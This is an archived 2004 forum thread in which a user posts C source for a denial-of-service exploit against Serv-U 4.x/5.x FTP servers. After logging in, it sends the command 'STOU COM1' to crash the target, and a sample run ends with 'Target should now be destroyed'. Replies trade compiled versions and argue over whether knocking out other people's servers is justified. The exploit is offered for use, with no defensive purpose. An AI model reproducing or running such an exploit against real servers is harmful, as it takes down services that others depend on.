Ecko your perl version is good and very good readable mortello your C code is a bit of crap sorry but for the first try ok use the Socket System
here is my C version
CODE
/****************************** * --------------------------- * Serv-U 4.x 5.x * DOS EXPLOIT * by cyrex@EFNet * ******** * Greetz * ------ * * - Ecko ( For his perl version ) * - mortello ( for his try to code in C :p) * - and all others * * * * BUG Discovery: * * cyrex@saturn:~$ ./sudos 192.168.1.5 1024 cyrex test * ------------------------------------ * Serv-U 4.x 5.x DOS Exploit * by cyrex@EFNet * ------------------------------------- * [+] - Connection to 192.168.1.5 * 220 Serv-U FTP Server v5.1 for WinSock ready... * 331 User name okay, need password. * 230 User logged in, proceed. * [+] - Connected.. Sending the last command * [*] - Target should now be destroyed.. * cyrex@saturn:~$ * **************************/
printf("[+] - Connected.. Sending the last command\n"); sprintf(buffer,"STOU COM1"); sendtotarget(buffer); printf("[*] - Target should now be destroyed..\n"); } }
int main(int argc, char *argv[]) { int port; printf("------------------------------------\n"); printf(" Serv-U 4.x 5.x DOS Exploit\n"); printf(" by cyrex@EFNet\n"); printf("-------------------------------------\n"); if((!argv[1]) || (!argv[2])) { help(argv[0]); exit(-1); } port=atoi(argv[2]); printf("[+] - Connection to %s\n",argv[1]); conn(argv[1],port,argv[3],argv[4]); }
Greets cyrex
mortello
Sep 14 2004, 03:00 AM
Good job....and yeah I know my code was not so good....btw read PM
Hellraiseruk
Sep 14 2004, 06:30 AM
what is the point of keep making different versions of this so called "exploit" all it is doing is destoying peoples hard work on there servers unless u achuly get a shell
Tyrano
Sep 14 2004, 06:51 AM
programming practice
Paul
Sep 14 2004, 07:24 AM
Its about sharing knowledge..
KuerbY
Sep 14 2004, 10:49 AM
its about: "(filtered) the fxp crap" we hate them we just only hate them and the versions are different... just dont install servu or a trojan write your own "programs" like cyrex etc etc
Progressor
Sep 14 2004, 12:33 PM
This is a wrong section. This section called "Files downloads", I don't see any file.
agathos
Sep 14 2004, 01:49 PM
Progessor , dont have a own compiler? ;D and it isnt the wrong Section btw You can download the Source Code or not ? :=)
here the compiled version of mine
KuerbY
Sep 14 2004, 04:46 PM
i dont want to be an ass but... i dont like compiled exploit, source or nothing i dont trust anyone then myself so i think everyone got a good compiler...
rscience
Sep 14 2004, 04:46 PM
grate work dude i will take this and TEST.
Hellraiseruk
Sep 14 2004, 04:59 PM
QUOTE (KuerbY @ Sep 14 2004, 10:49 AM)
its about: "(filtered) the fxp crap" we hate them we just only hate them and the versions are different... just dont install servu or a trojan write your own "programs" like cyrex etc etc
u hate them? well the fxp scene gets things on to IRC and p2p networks for u little n00bie kids to download just cuz u don't have axx..some gelously
agathos
Sep 14 2004, 05:40 PM
fxp scene suc ks very very ;D join site scene
cyrixx
Sep 14 2004, 08:51 PM
but not everyone has the chance to join a site...
TRi
Sep 14 2004, 10:04 PM
All these arrogance in this world, its a shame.
You guys fit perfectly to the 17th centuy, looking down on the normal people above from your high and great palaces. Be lucky of yourself and if you enjoy showing off with it, well then thats your business..
Ecko
Sep 24 2004, 10:50 AM
QUOTE (Hellraiseruk @ Sep 14 2004, 06:30 AM)
what is the point of keep making different versions of this so called "exploit" all it is doing is destoying peoples hard work on there servers unless u achuly get a shell
peoples hard work!? you mean fxp pplz whick hacked btw. owned a Server and installed there a ftpd? hm, when that's of hard for u then i don't wanna know whats easy for you
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.